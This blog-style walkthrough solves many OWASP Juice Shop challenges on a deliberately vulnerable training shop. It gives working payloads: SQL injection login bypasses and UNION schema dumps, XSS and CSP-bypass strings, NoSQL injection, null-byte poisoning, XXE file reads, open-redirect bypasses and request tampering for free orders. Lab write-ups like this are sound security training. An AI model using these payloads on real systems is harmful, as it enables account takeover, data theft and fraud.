OWASP Juice Shop
November 9, 2021•3,019 words
OWASP Juice Shop
This is how I solved some of the challenges listed in the OWASP Juice Shop scoreboard, you can find the one that interests you by searching its name in the table.
| Error Handling (Provoke an error that is neither very gracefully nor consistently handled.) | Try a URL of your choice to see if anything funny happens, some error handling practices could give you great results in terms of finding vulnerabilities. In this case, it reveals the framework AND it solves the challenge. |
| Score Board (Find the carefully hidden 'Score Board' page.) | Read the JS included in every page, there is a mention to a score-board. Try this as a URL and you are done! |
| Bonus Payload (...) | Paste the payload given in the search bar and trigger this fun experience |
DOM XSS (Perform a DOM XSS attack with <iframe src="javascript:alert(xss)">.) | Paste the payload in the search bar and the job is done. XSS in the search bar is easy :) |
| Zero Stars (Give a devastating zero-star feedback to the store.) | Intercept the request and modify the Rating value to zero. Using Burp this is easy, barely an inconvenience. |
| Payback Time (Place an order that makes you rich.) | Modify the request that adds to the basket and ask for a negative quantity of an item. Complete the checkout and enjoy your new free money |
| Privacy Policy (Read our privacy policy.) | Register an account and log in. In the new menu you can find the privacy policy. |
| Login Admin (Log in with the administrator's user account.) | Login using the mail ' OR 1=1 -- - and anything you want in the password, as it will be commented out and doesn't matter |
| Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.) | The token you receive when logging in is a JWT token. Analyze it (using, for example, jwt.io) and retrieve the password's hash. Luckily, the password isn't all that strong, so you can easily crack it online and access without the need for SQLi. |
| Admin Section | You have admin credentials, but nothing seems different. There must be some secret section. Brute forced it, honestly, tried "administrator", "admin" and "administration". Lucky, I guess |
| Five-Star Feedback (Get rid of all 5-star customer feedback.) | In the administration section, delete the 5 star review. |
| Bully Chatbot (Receive a coupon code from the support chatbot.) | Bomb the chatbot asking for a coupon using the repeater, after some attempts it will give up and assign you a 10% discount code: pEw8pf!Cal |
| Login MC SafeSearch (Log in with MC SafeSearch's original user credentials without applying SQL Injection or any other bypass.) | There is a video from this rapper sharing his login information. Just remember the password is the one he says at the start of the video, not the changed one you see on his screen |
| Confidential Document (Access a confidential document.) | There is a link in the terms of use that lets you download a file. The file is pointless, but the path is extremely interesting. Open the directory where you got that from and there is plenty of interesting informations in there. |
| Deprecated Interface (Use a deprecated B2B interface that was not properly shut down.) | The file upload functionality in the Complaint section allows to upload PDF and ZIP, or so it seems. The Javascript file responsible for this also lists XML as supported, so in the File Name section of the upload type *.xml and select an XML file. Upload it, add a complain message and you're done! |
| Exposed Metrics (Find the endpoint that serves usage data to be scraped by a popular monitoring system.) | The name of the monitoring system is given to you, so Google it and you can find a list of possible endpoints. It's a really basic guess, as well |
| Outdated Allowlist (Let us redirect you to one of our crypto currency addresses which are not promoted any longer.) | In one of the files included in all pages there is a reference to an old redirect that will get you to a bitcoin address, which solves this challenge |
| Repetitive Registration (Follow the DRY principle while registering a user.) | The check on whether you entered the same password is front-end only. Intercept, insert two different passwords just for the sake of it and move on to the next challenge |
| Missing Encoding (Retrieve the photo of Bjoern's cat in "melee combat-mode".) | In the Photo Wall section there is one image missing. If you look at the URL you will notice the hashtags in the name aren't encoded, which causes problems as hashtags have a special meaning when inside a URL. Escape them with their URL encoded version "%23" |
| Meta Geo Stalking (Determine the answer to John's security question by looking at an upload of him to the Photo Wall and use it to reset his password via the Forgot Password mechanism.) | John posted a picture on the photo wall that depicts is favourite hiking spot. Download the image and analyze it, there are still coordinates in it. Now this is tricky, jot down a few possible answers because it is not super easy to find the correct one. Once you get it, you can reset his password. |
| Weird Crypto (Inform the shop about an algorithm or library it should definitely not use the way it does.) | Looking at passwords, like the one I cracked earlier, it's clear the shop uses md5 as their password hashing algorithm. Let them know in the feedback section by submitting a feedback that says "md5" and this challenge is done |
| View Basket (View another user's shopping basket.) | When you ask for your basket, check the request. There is a clear parameter you can tamper with in the URL, this will give you access to other users' baskets. |
| Visual Geo Stalking (Determine the answer to Emma's security question by looking at an upload of her to the Photo Wall and use it to reset her password via the Forgot Password mechanism.) | As with John's challenge, she updated a picture to the photo wall. This time look more carefully, there is something written on the first window left, second floor. Zoom in hard enough and you will get the name of the company, which is also the answer to her security question. |
| Security Policy (Behave like any "white-hat" should before getting into the action.) | As defined in the relative RFC, the security.txt is under the ".well-known" directory |
Reflected XSS (Perform a reflected XSS attack with <iframe src="javascript:alert(xss)">.) | The id parameter you see in the URL of the Track Order page (the small delivery truck) is reflected in the page, quite clear to see. Insert the payload for the reflected XSS and it's done |
| Admin Registration (Register as a user with administrator privileges.) | During the registration process, modify the request adding the field "role" with value "admin". |
| Login Bender (Log in with Bender's user account.) | We know the login form suffers from SQLi, so you only need a very basic bender@juice-sh.op' -- - in the username field |
| Login Jim (Log in with Jim's user account.) | Same as right above, except with Jim's email. |
| CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.) | Intercept the request and quickly repeat it multiple times to pass this challenge. |
| CSRF (Change the name of a user by performing Cross-Site Request Forgery from another origin.) | Use the given website to create an HTML form with a single input field, called username and with the value of CSRF. Submit this to the correct /profile endpoint. Try opening this page you just created to perform a CSRF attack against the user you are logged in as (in a different tab). |
| Product Tampering (Change the href of the link within the OWASP SSL Advanced Forensic Tool (O-Saft) product description into https://owasp.slack.com.) | Submit a PUT request that modifies the description field as requested by the challenge. To identify the product you can watch the requests and find out that its product ID is 9. |
| Bjoern's Favorite Pet (Reset the password of Bjoern's OWASP account via the Forgot Password mechanism with the original answer to his security question.) | Look up Bjorn Kimminich, he posts about his cat quite a bit. Sometimes he slips the name in its post, oops. Use it to reset the password. |
| Forged Review (Post a product review as another user or edit any user's existing review.) | Intercept the request that creates a review, modify the username associated with it and set it to another user's. |
| Reset Jim's Password (Reset Jim's password via the Forgot Password mechanism with the original answer to his security question.) | Everything ever done by Jim on the platform is a reference to the person of Captain Kirk, who appears to have a brother whose middle name is Samuel. This is the answer to the security question, use it to reset his password. |
| Upload Size (Upload a file larger than 100 kB.) | Upload to /file-upload using a tool like Burp or Postman with a parameter named file |
| Upload Type (Upload a file that has no .pdf or .zip extension.) | The restriction is strictly front-end, no problem if you try from a tool like Burp or Postman. Easy bypass |
| Manipulate Basket (Put an additional product into another user's shopping basket.) | An example of HTTP parameter pollution, the application behavior is not well defined if you write "BaskedId" twice in the request to add a product to your shopping cart. The first one passes the check as you set it to your basket's value, the second one you add gets the item added to its cart as well. |
| GDPR Data Erasure (Log in with Chris' erased user account.) | Could not find any reference to chris's email, but the fact that he has an erased account gives us the opportunity to try this injection in the login form: ' or deletedAt IS NOT NULL -- - Fortunately enough he is the first user returning from this query, so we pass the challenge |
| Login Amy (Log in with Amy's original user credentials. (This could take 93.83 billion trillion trillion centuries to brute force, but luckily she did not read the "One Important Final Note")) | Search the very specific sentence about cracking time on Google. This takes you on a brute-force key-space calculator. At the end there is a section explaining how password padding is not a good idea. Except that Amy does not know this and used her husband's name (leet the i) with a few trailing dots. |
| Privacy Policy Inspection (Prove that you actually read our privacy policy.) | Inside the privacy policy some words will trigger a visual effect similar to a fire in the back. Combine these words in a URL and get to it, unlocking this challenge. Compose the url using each word as a directory, just/like/this |
| Forged Feedback (Post some feedback in another users name.) | Change the user ID in the request to the one of a different user and you are done |
| Deluxe Fraud (Obtain a Deluxe Membership without paying for it.) | The button to pay with your wallet is disabled. Remove the disabled from the page source and click it. Watch the request, it contains a JSON key-value parameter. Edit the value so that it is an empty string and the shop gives you a free membership. |
| API-only XSS (Perform a persisted XSS attack with <iframe src="javascript:alert( xss)"> without using the frontend applicationat all.) | Post a product using a POST to /api/Products. Three fields required in the JSON: name, description and price. Name is well escaped, but I am afraid the same cannot be said for the description field, which triggers your lovely XSS |
| Client-side XSS Protection (Perform a persisted XSS attack with <iframe src="javascript:alert( xss)"> bypassing a client-side security mechanism.) | Catch the request generated when a user creates an account. There is a client side filter for the email, but if you replay it with Burp or create one with Postman you can put the specified payload in the email and you are ready to move on to the next challenge. Side note: the XSS is triggered in the administration page |
| XXE Data Access (Retrieve the content of C:\Windows\system.ini or /etc/passwd from the server.) | Create an XML file containing an external entity definition that requests either one of these two files. Remember, you can upload XML files in the complaint section, as we did in a previous challenge. |
| Christmas Special (Order the Christmas special offer of 2014.) | Check the search bar, it is susceptible to SQL injection. Judging from the error messages, you can build a correct payload in the form '))-- Looking at the list of products retrieved, you can identify the Christmas special. Intercept the request performed whenever you add a product to the basket and modify it, asking to add the Christmas special (using its unique ID). Perform the checkout to pass the challenge. |
| Database Schema (Exfiltrate the entire DB schema definition via SQL Injection.) | We know from the previous challenge that we have SQLi on the q parameter in the search function. With a UNION select, we can try to identify how many columns we need to return (blabla')) UNION SELECT 1,2,3,4,5,6,7,8,9 from sqlitemaster works) We just need to retrieve the "sql" column from sqlitemaster, so just substitute one of the numbers with the "sql" column. |
| Login Support Team (Log in with the support team's original user credentials without applying SQL Injection or any other bypass.) | Searching the main JS file reveals the following message:"@echipa de suport: Secretul nostru comun este \xeenc\u0103 Caoimhe cu parola de master gol!" Search the name, it suggests it's Irish. There is a redhead in the about us section (stereotypes?). You can use her image as key to open the kdbx file and obtain the password to login as the support. |
| Access Log (Gain access to any access log file of the server.) | A directory bust should easily lead you to /support/logs. Download the file that is there to pass the challenge. |
CSP Bypass (Bypass the Content Security Policy and perform an XSS attack with <script>alert(xss)</script> on a legacy page within the application.) | The "link an image" function in the profile page allows you to overwrite the CSP when you link a non existing URL. Modify the CSP so that it allows unsafe script execution from inline scripts and insert a payload for XSS in the username field. Careful though, there is a filter. Not the smartest of filters, can be bypassed with <<w|wscript>alert('XSS')</script>. |
| Leaked Unsafe Product (Identify an unsafe product that was removed from the shop and inform the shop which ingredients are dangerous.) | An OSINT challenge. Everything starts from the SQLi that revealed all the products, including the removed ones. Search the list of ingredients you see for the dangerous item, and you should find a page where a user suggests some exotic fruits made their way into this product. There is a link to a page with the full list of ingredients. You need to send to the support the two ones that seem to be fatal when combined. |
| Easter Egg (Find the hidden easter egg.) | In the ftp section there is a file named eastere.gg You can only download md and pdf files, but performing Null Byte Poisoning you are able to bypass this check. Simply request eastere.gg%2500.md, for example |
| Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.) | The explanation above shows how to perform a null byte poisoning attack, you will kill two birds with one stone(?). |
| Nested Easter Egg (Apply some advanced cryptanalysis to find the real easter egg.) | Take the content of the easter egg, it's clearly in some form of base. Very easily, base64. Once decoded, looks like a URL, but it just doesn't work. Try rotating it using a ROT13 mutation and you will get /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg, which seems just about right. |
| Expired Coupon (Successfully redeem an expired campaign coupon code.) | Inside the main JS file, search for "campaign". You will see there is a list of valid coupon codes, and also a validation procedure that checks if the coupon is still valid. Pick one, translate the JS timestamp and set your system time so that the coupon would still be valid (remember to turn ntp off with set ntp-off, then run date -s "<the date you need"). Complete the checkout and you are done |
| Forgotten Developer Backup (Access a developer's forgotten backup file.) | There is a bak file in the ftp directory, use the null byte poisoning technique to retrieve it and complete the challenge. |
| Forgotten Sales Backup (Access a salesman's forgotten backup file.) | Same technique as right above, just do it on the right file (coupons_...) |
| Login Bjoern (Log in with Bjoern's Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.) | Bjoern used oAuth. Check for the word "oauth" in the main JS, you will find that the application, needing to set a password, simply takes the mail, reverses it and encodes it into base64. Simply follow these steps to get the password you need. |
| GDPR Data Theft (Steal someone else's personal data without using Injection.) | Check the track order request and notice that the user information has all vowels removed. Create two users that, once all vowels are removed, collide resulting in the same username. Now export your data in the privacy section and steal all the tracing of the other users' orders. |
| Misplaced Signature File (Access a misplaced SIEM signature file.) | Read the appropriate file in the ftp directory using the same trick as before, the null byte poisoning technique (the file is "suspicious...") |
| NoSQL DoS (Let the server sleep for some time. (It has done more than enough hard work for you)) | The server shows you products' reviews. Analyze the get request that generates this, and substitute the product ID with a sleep(2000) request. |
| NoSQL Manipulation (Update multiple product reviews at the same time.) | Notice the PATCH request when reviewing products. Modify the request so that the body is as follows: {"id":{"$ne":-1},"message":"NoSQL Injection!"} |
| Allowlist Bypass (Enforce a redirect to a page you are not supposed to redirect to.) | There is a redirect when you click on the Github section in the navigation pane on the left. The allow list seems to work only if there is the Github part of the URL present in the redirect, so you can use a payload like: /redirect?to=http://x.com?url=https://github.com/bkimminich/juice-shop |